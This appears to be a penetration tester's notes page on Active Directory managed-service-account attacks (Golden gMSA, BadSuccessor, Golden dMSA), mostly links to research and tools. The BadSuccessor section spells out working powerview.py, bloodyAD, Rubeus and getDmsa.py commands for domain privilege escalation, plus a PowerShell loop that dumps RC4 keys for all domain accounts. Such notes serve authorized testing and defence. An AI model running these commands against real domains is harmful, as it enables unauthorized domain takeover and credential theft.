# gMSA / dMSA

## Golden gMSA

* <https://www.semperis.com/blog/golden-gmsa-attack/>
* <https://github.com/Semperis/GoldenGMSA>

## BadSuccessor

* <https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory>
* <https://www.akamai.com/blog/security-research/badsuccessor-is-dead-analyzing-badsuccessor-patch>
* <https://medium.com/seercurity-spotlight/operationalizing-the-badsuccessor-abusing-dmsa-for-domain-privilege-escalation-429cefc36187>
* <https://sapirxfed.com/2025/05/24/the-new-dmsa-vuln-for-people-who-dont-know-what-dmsa-is/>
* <https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/>
* <https://kreep.in/badsuccessor-abusing-dmsas-for-ad-domination/>

Enumerate OUs where we can create child objects (using [powerview.py](https://github.com/aniqfakhrul/powerview.py) or [bloodyAD](https://github.com/CravateRouge/bloodyAD)):

```
PV > Get-DomainObjectAcl -LDAPFilter "(objectClass=organizationalUnit)" -Where "ActiveDirectoryRights contains CreateChild"
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] get writable --otype OU [--right CHILD]
```

Create a dMSA account with a superseded account in the `msDS-ManagedAccountPrecededByLink` property (using [powerview.py](https://github.com/aniqfakhrul/powerview.py) or [bloodyAD](https://github.com/CravateRouge/bloodyAD)):

```
PV > Add-DomainDMSA -Identity mydmsa -PrincipalsAllowedToRetrieveManagedPassword jdoe -SupersededAccount DC01 [-BaseDN "CN=Managed Service Accounts,DC=megacorp,DC=local"]
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] add badSuccessor mydmsa -t "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local" [--ou "CN=Managed Service Accounts,DC=megacorp,DC=local"]
```

Ask for a TGT containing the superseded account PAC (using [Rubeus](https://github.com/GhostPack/Rubeus) or [minikerberos-getDmsa](https://github.com/skelsec/minikerberos/blob/main/minikerberos/examples/getDmsa.py)):

```
Cmd > Rubeus.exe asktgs /targetuser:mydmsa$ /service:krbtgt/megacorp.local /dmsa /opsec /nowrap /ticket:<JDOE_TGT>
$ python3 minikerberos/examples/getDmsa.py 'kerberos+ccache://megacorp.local\jdoe:tgt.ccache@192.168.1.11' 'mydmsa$@megacorp.local' --ccache /tmp/mydmsa.ccache
```

Request TGT and grep for "previous keys" (from `KERB-DMSA-KEY-PACKAGE` structure), which is actually current RC4 of the superseded account, for all domain users and computers in a loop (requires [this Rubeus](https://github.com/GhostPack/Rubeus/compare/master...YuG0rd:Rubeus:master)):

```powershell
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
```

### Tools

* <https://github.com/akamai/BadSuccessor>
* <https://github.com/logangoins/SharpSuccessor>
* <https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessorCheck.ps1>
* <https://github.com/fulc2um/impacket/blob/badsuccessor/examples/badsuccessor.py>

## Golden dMSA

* <https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/>
* <https://github.com/Semperis/GoldenDMSA>